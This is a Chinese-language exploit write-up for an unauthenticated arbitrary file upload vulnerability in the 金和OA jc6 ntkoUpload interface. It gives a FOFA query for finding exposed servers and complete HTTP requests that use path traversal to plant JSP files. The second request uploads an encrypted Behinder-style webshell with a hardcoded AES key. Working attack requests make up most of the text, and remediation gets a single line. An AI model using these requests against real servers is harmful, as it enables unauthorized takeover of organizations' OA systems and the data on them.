产品简介
金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统升开发平台,电子政务一体化平台智慧电商平合等服务
漏洞概述
金和OA jc6系统ntkoUpload接口处存在任意文件上传漏洞,未经身份认证的攻击者可利用此漏洞上传恶意后门文件,最终可导致服务器失陷。
指纹识别
fofa:
app="金和网络-金和OA"
漏洞利用
poc:
POST /jc6/ntkoUpload/ntko-upload!upload.action HTTP/1.1
Host: you_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Content-Length: 392
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----zqulxi4ku42pfmoelvc0
Connection: close
------zqulxi4ku42pfmoelvc0
Content-Disposition: form-data; name="filename"
../../../../upload/xicxc2sv1n.jsp
------zqulxi4ku42pfmoelvc0
Content-Disposition: form-data; name="upLoadFile"; filename="xicxc2sv1n.jpg"
Content-Type: image/jpeg
<% out.println(111*111); %>
------zqulxi4ku42pfmoelvc0
Content-Disposition: form-data; name="Submit"
upload
------zqulxi4ku42pfmoelvc0--
验证url
http://you_ip/upload/请求体中自定义文件名
上传webshell
POST /jc6/ntkoUpload/ntko-upload!upload.action HTTP/1.1
Host: you_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Content-Length: 884
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----ow5vper5glgwwejbu7pp
Connection: close
------ow5vper5glgwwejbu7pp
Content-Disposition: form-data; name="filename"
../../../../upload/hhh.jsp
------ow5vper5glgwwejbu7pp
Content-Disposition: form-data; name="upLoadFile"; filename="hhh.jpg"
Content-Type: image/jpeg
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
------ow5vper5glgwwejbu7pp
Content-Disposition: form-data; name="Submit"
upload
------ow5vper5glgwwejbu7pp--
尝试连接
修复建议
联系厂软件商更新至最新安全版本
【是人就有私心,就容易走错路。】